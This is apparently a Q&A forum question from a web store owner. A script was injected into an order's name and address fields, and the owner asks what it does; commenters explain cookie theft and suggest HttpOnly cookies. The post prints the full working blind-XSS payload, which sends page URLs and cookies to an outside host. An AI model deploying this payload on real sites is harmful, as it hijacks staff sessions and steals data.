2

Operating a web store via one of the popular platforms and had an order come through with the following script embedded in several of the fields: name, address, etc. I'm trying to understand what the script accomplishes. I've removed any way for it run on this page I hope:

[script src=//XX.YY/g][/script]

btw, XX=jb & YY=gy

==>>

(function(){(new Image()).src='http://XX.YY/index.php?do=api&id=g&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if('1'==1){keep=new Image();keep.src='http://XX.YY/index.php?do=keepsession&id=g&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
x=new Image();
x.src="http://XX.YY/authtest.php?id=g&info=cheeptrims.com";
A Bomb
  • 21
  • 3
  • Looks like something that steals your browser cookies, which is essentially a key to your login session, along with other information, and sends it to a server. Can you supply what XX.YY is? – Nolan Apr 04 '18 at 14:02
  • This would have been executed by employees whenever they loaded this order in our internal network. The session info sent would only have been related to that internal / non-public url. Should we be worried about anything sensitive that might have been transferred? – A Bomb Apr 04 '18 at 14:05
  • This may be a better SE for this question. https://security.stackexchange.com – DeeV Apr 04 '18 at 14:06
  • I would make sure that all your sites cookies are HTTP only. If you are not sure, hit F12 (in Google Chrome), go to the console tab, and type document.cookie If nothing is returned, your site is secure. Let me know the results. – Nolan Apr 04 '18 at 14:09
  • The XX.YY equates to jb.gy – A Bomb Apr 04 '18 at 14:17

0 Answers0